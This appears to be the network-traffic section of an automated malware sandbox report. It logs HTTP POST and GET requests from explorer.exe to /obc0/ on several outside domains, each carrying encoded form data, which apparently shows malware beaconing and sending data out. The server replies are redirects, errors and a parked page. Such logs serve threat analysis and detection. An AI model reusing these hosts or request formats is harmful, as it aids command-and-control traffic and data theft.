                                                                                      Oct 11, 2022 05:57:34.360590935 CEST421OUTPOST /obc0/ HTTP/1.1
                                                                                      Host: www.skyepattest.com
                                                                                      Connection: close
                                                                                      Content-Length: 188
                                                                                      Cache-Control: no-cache
                                                                                      Origin: http://www.skyepattest.com
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://www.skyepattest.com/obc0/
                                                                                      Accept-Language: en-US
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Data Raw: 2d 5a 62 68 39 38 3d 32 4e 36 6e 38 5f 43 6b 75 48 53 35 64 75 51 69 42 71 65 2d 4b 57 28 50 69 73 36 56 79 69 49 53 71 56 76 72 45 77 41 71 75 6a 79 52 32 76 61 45 54 69 37 68 78 6e 28 33 57 37 6c 52 69 67 67 32 6f 6c 36 47 63 53 4e 59 77 33 4f 47 6f 31 4a 79 7a 7a 35 36 59 54 72 79 5a 39 31 49 63 51 58 2d 5a 46 46 5a 5a 30 68 65 32 4c 62 52 70 6a 38 31 4e 46 62 41 78 2d 61 71 4b 6e 79 5a 35 5a 4e 69 42 6d 6c 48 6a 5f 5a 4f 50 4b 70 51 31 50 4a 41 69 62 46 4d 39 34 4e 76 76 6b 58 5a 59 45 6d 71 55 63 73 7a 58 34 72 49 78 68 4a 6a 55 70 4b 34 42 67 29 2e 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: -Zbh98=2N6n8_CkuHS5duQiBqe-KW(Pis6VyiISqVvrEwAqujyR2vaETi7hxn(3W7lRigg2ol6GcSNYw3OGo1Jyzz56YTryZ91IcQX-ZFFZZ0he2LbRpj81NFbAx-aqKnyZ5ZNiBmlHj_ZOPKpQ1PJAibFM94NvvkXZYEmqUcszX4rIxhJjUpK4Bg).
                                                                                      Oct 11, 2022 05:57:34.381963015 CEST422INHTTP/1.1 302 Moved Temporarily
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:34 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      Location: https://www.skyepattest.com/obc0/
                                                                                      Expires: Tue, 11 Oct 2022 04:17:34 GMT
                                                                                      Cache-Control: max-age=1200
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      14192.168.2.449713217.160.0.16780C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:36.412740946 CEST422OUTGET /obc0/?-Zbh98=7PSH/Ln00kiEZ+8VHNPsGnjemOaV3QQvmjWzLH8ChjGT6OrVSUax7xbhQJ4P9gQznTCEUU1HjkXGkkJ8y3lbGhe/UOddQQeZUw==&C0=X82hHfExC6QP HTTP/1.1
                                                                                      Host: www.skyepattest.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 11, 2022 05:57:36.435178995 CEST423INHTTP/1.1 302 Moved Temporarily
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:36 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      Location: https://www.skyepattest.com/obc0/?-Zbh98=7PSH/Ln00kiEZ+8VHNPsGnjemOaV3QQvmjWzLH8ChjGT6OrVSUax7xbhQJ4P9gQznTCEUU1HjkXGkkJ8y3lbGhe/UOddQQeZUw==&C0=X82hHfExC6QP
                                                                                      Expires: Tue, 11 Oct 2022 04:17:36 GMT
                                                                                      Cache-Control: max-age=1200
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.44970169.57.163.5080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:56:52.316946983 CEST383OUTGET /obc0/?-Zbh98=V2kSpVpGpqmsc+zV99/vwEPQm6AjbD0sNlmHlMce7g5oKKN3NgpJQJsKfnUSGJnURE4hRqcigFYsP8mgf+TOZi6v6bw37RqyMQ==&C0=X82hHfExC6QP HTTP/1.1
                                                                                      Host: www.negerbajs.info
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 11, 2022 05:56:52.583540916 CEST384INHTTP/1.1 404 Not Found
                                                                                      Date: Tue, 11 Oct 2022 03:56:52 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 4406
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>
                                                                                      Oct 11, 2022 05:56:52.583606958 CEST385INData Raw: 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72
                                                                                      Data Ascii: ...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http:/
                                                                                      Oct 11, 2022 05:56:52.583636999 CEST387INData Raw: 20 3c 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                      Data Ascii: <ul> <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <
                                                                                      Oct 11, 2022 05:56:52.583662033 CEST387INData Raw: 65 61 72 63 68 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                      Data Ascii: earch</a> </div> </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right">


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.44970252.60.87.16380C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:02.917025089 CEST389OUTPOST /obc0/ HTTP/1.1
                                                                                      Host: www.augusta.broker
                                                                                      Connection: close
                                                                                      Content-Length: 412
                                                                                      Cache-Control: no-cache
                                                                                      Origin: http://www.augusta.broker
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://www.augusta.broker/obc0/
                                                                                      Accept-Language: en-US
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Data Raw: 2d 5a 62 68 39 38 3d 28 6b 62 6b 54 46 49 4f 65 79 54 6e 50 79 62 42 63 47 42 6e 39 38 53 64 6e 35 32 4f 6a 53 32 6d 31 68 7e 71 46 79 4b 71 30 6c 65 30 75 46 51 75 39 61 4d 37 4c 5f 32 6f 56 45 68 37 37 39 37 66 73 76 78 6e 53 66 33 6b 54 42 43 6c 52 50 4a 33 75 2d 64 6f 6d 4f 6b 77 31 52 30 39 32 46 79 53 58 79 49 76 42 38 36 36 35 67 34 31 71 6a 74 45 52 39 69 59 4a 7a 6f 31 73 30 4b 61 69 4a 31 57 63 74 4b 6b 79 67 35 44 43 66 39 49 38 6a 53 6c 39 73 43 5a 4d 55 37 65 35 75 30 5a 31 6c 6f 57 61 32 4c 58 73 34 66 73 4e 51 34 64 79 69 64 75 55 77 75 6e 4f 33 28 4a 54 67 31 30 7a 75 6c 46 52 79 62 36 57 79 31 6a 42 50 41 6c 78 4f 6f 67 67 49 4c 72 6d 34 54 59 64 79 61 4c 59 46 71 59 61 6d 6c 35 30 67 56 6a 32 46 58 58 78 51 4f 42 68 50 78 4f 64 59 30 38 57 6a 36 63 47 68 5a 57 63 52 34 35 6f 32 71 59 28 33 64 6b 36 50 6c 59 58 68 38 43 5a 58 69 5f 47 46 72 6a 31 42 61 4d 77 76 65 55 4c 59 75 52 74 63 65 55 54 6d 72 50 73 7a 55 6d 4d 69 43 46 6a 62 4d 4c 4f 67 69 46 42 41 44 47 48 45 78 32 69 78 30 74 6e 65 53 4b 6f 45 6b 7a 46 4c 33 73 54 54 4b 6e 73 52 68 69 36 32 55 71 78 48 35 30 38 71 61 4b 62 4b 53 39 68 6d 44 4e 78 78 6b 4a 6c 31 76 38 38 63 73 2d 32 35 55 70 41 55 72 36 53 57 72 64 4b 32 79 4e 65 51 29 2e 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: -Zbh98=(kbkTFIOeyTnPybBcGBn98Sdn52OjS2m1h~qFyKq0le0uFQu9aM7L_2oVEh7797fsvxnSf3kTBClRPJ3u-domOkw1R092FySXyIvB8665g41qjtER9iYJzo1s0KaiJ1WctKkyg5DCf9I8jSl9sCZMU7e5u0Z1loWa2LXs4fsNQ4dyiduUwunO3(JTg10zulFRyb6Wy1jBPAlxOoggILrm4TYdyaLYFqYaml50gVj2FXXxQOBhPxOdY08Wj6cGhZWcR45o2qY(3dk6PlYXh8CZXi_GFrj1BaMwveULYuRtceUTmrPszUmMiCFjbMLOgiFBADGHEx2ix0tneSKoEkzFL3sTTKnsRhi62UqxH508qaKbKS9hmDNxxkJl1v88cs-25UpAUr6SWrdK2yNeQ).
                                                                                      Oct 11, 2022 05:57:03.023365021 CEST389INHTTP/1.1 502 Bad Gateway
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:02 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 150
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.44970352.60.87.16380C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:05.055154085 CEST390OUTPOST /obc0/ HTTP/1.1
                                                                                      Host: www.augusta.broker
                                                                                      Connection: close
                                                                                      Content-Length: 188
                                                                                      Cache-Control: no-cache
                                                                                      Origin: http://www.augusta.broker
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://www.augusta.broker/obc0/
                                                                                      Accept-Language: en-US
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Data Raw: 2d 5a 62 68 39 38 3d 28 6b 62 6b 54 46 49 4f 65 79 54 6e 4d 46 48 42 52 56 35 6e 6c 73 53 64 28 35 32 4d 6a 53 32 6c 31 68 7e 6d 46 32 37 79 31 53 69 30 75 51 30 75 7e 73 51 37 49 5f 32 6e 4e 55 68 33 31 64 37 76 73 76 78 52 53 61 50 6b 54 46 71 6c 52 50 5a 33 75 4e 46 72 6e 4f 6b 32 35 78 30 38 79 46 79 48 58 79 55 37 42 2d 7e 36 35 69 41 31 72 55 35 45 52 75 4b 62 44 7a 6f 77 6a 55 4c 53 37 35 31 53 63 74 4b 47 79 67 35 74 43 63 46 49 67 44 43 6c 76 65 61 61 46 55 37 58 31 4f 31 6e 36 46 6b 5a 57 46 75 6b 6b 72 48 6d 47 58 64 4f 38 6a 5a 71 43 51 29 2e 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: -Zbh98=(kbkTFIOeyTnMFHBRV5nlsSd(52MjS2l1h~mF27y1Si0uQ0u~sQ7I_2nNUh31d7vsvxRSaPkTFqlRPZ3uNFrnOk25x08yFyHXyU7B-~65iA1rU5ERuKbDzowjULS751SctKGyg5tCcFIgDClveaaFU7X1O1n6FkZWFukkrHmGXdO8jZqCQ).
                                                                                      Oct 11, 2022 05:57:05.161370039 CEST391INHTTP/1.1 502 Bad Gateway
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 150
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.44970452.60.87.16380C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:07.202677965 CEST391OUTGET /obc0/?-Zbh98=ymzEQwRFXCPDCi+CRQJb7/Cu/KCeuwmnwGnTOFfe8Wu9oS0w58wfIKm/BUV3lMrC1MN0SKPFf3LORs93kZV7msxn8x5u5Wnabg==&C0=X82hHfExC6QP HTTP/1.1
                                                                                      Host: www.augusta.broker
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 11, 2022 05:57:07.308969975 CEST393INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Length: 17061
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Vary: Accept-Encoding
                                                                                      Cache-Control: max-age=604800
                                                                                      Expires: Mon, 17 Oct 2022 23:35:58 +0000
                                                                                      Content-Security-Policy: default-src 'self' 'unsafe-inline' https://park.101datacenter.net https://*.deviceatlascloud.com/ https://cs.deviceatlas-cdn.com data:
                                                                                      Access-Control-Allow-Origin: https://park.101datacenter.net
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Cached: HIT
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 75 74 75 72 65 20 68 6f 6d 65 20 6f 66 20 61 75 67 75 73 74 61 2e 62 72 6f 6b 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 52 65 67 69 73 74 72 61 74 69 6f 6e 20 2d 20 72 65 67 69 73 74 65 72 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 6c 69 6e 65 2c 61 6e 64 20 67 65 74 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 77 61 6e 74 20 77 68 69 6c 65 20 69 74 27 73 20 73 74 69 6c 6c 20 61 76 61 69 6c 61 62 6c 65 2e 20 49 6e 74 65 72 6e 65 74 20 44 6f 6d 61 69 6e 20 52 65 67 69 73 74 72 61 74 69 6f 6e 20 26 20 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 20 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 52 65 67 69 73 74 72 61 74 69 6f 6e 2e 22 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 35 2e 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 4e 41 4d 45 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 43 4f 4e 54 45 4e 54 3d 22 31 35 20 64 61 79 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 76 65 6e 64 6f 72 2d 31 2f 69 63 6f 6e 2f 31 30 31 64 6f 6d 61 69 6e 2e 69 63 6f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d
                                                                                      Data Ascii: <!DOCTYPE html><html dir="ltr" lang="en" ><head><title>Future home of augusta.broker</title><meta name="description" content="Domain Name Registration - register your domain name online,and get the name you want while it's still available. Internet Domain Registration & International Domain Name Registration."><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" /><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /><meta name="robots" content="index, follow" /><meta name="googlebot" content="index, follow" /><meta NAME="revisit-after" CONTENT="15 days"><link rel="shortcut icon" href="/images/vendor-1/icon/101domain.ico"><link rel="preload" as="font" type=
                                                                                      Oct 11, 2022 05:57:07.308998108 CEST394INData Raw: 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 73 2f 4c 61 74 6f 52 65 67 75 6c 61 72 2e 77 6f 66 66 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20
                                                                                      Data Ascii: "font/woff2" crossorigin="anonymous" href="/css/fonts/LatoRegular.woff2" /><link rel="preload" as="image" type="image/webp" href="/images/vendor-1/park-back.webp" /><style>@font-face{font-family:system;font-style:normal;font-weight:400;src:
                                                                                      Oct 11, 2022 05:57:07.309022903 CEST395INData Raw: 2d 68 65 61 64 65 72 20 68 31 20 73 74 72 6f 6e 67 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 63 68 6f 69 63 65 20 2e 63 6f 6c 2d 62 61 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66
                                                                                      Data Ascii: -header h1 strong{color:#fff;display:block}.choice .col-base{background-color:#fff;padding:2rem;margin-top:3rem;margin-bottom:1.5rem}.choice-icon{width:4rem;height:4rem;display:inline-block;padding:1rem;margin:-5rem auto 0 auto}.choice-icon.ye
                                                                                      Oct 11, 2022 05:57:07.309046984 CEST397INData Raw: 3a 30 20 30 20 31 2e 35 72 65 6d 20 30 7d 2e 75 70 73 65 6c 6c 20 2e 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 64 65 36 36 38 3b 70 61 64 64 69 6e 67 3a 2e 35 72 65 6d 20 2e 37 35 72 65 6d 3b 64 69 73 70 6c 61
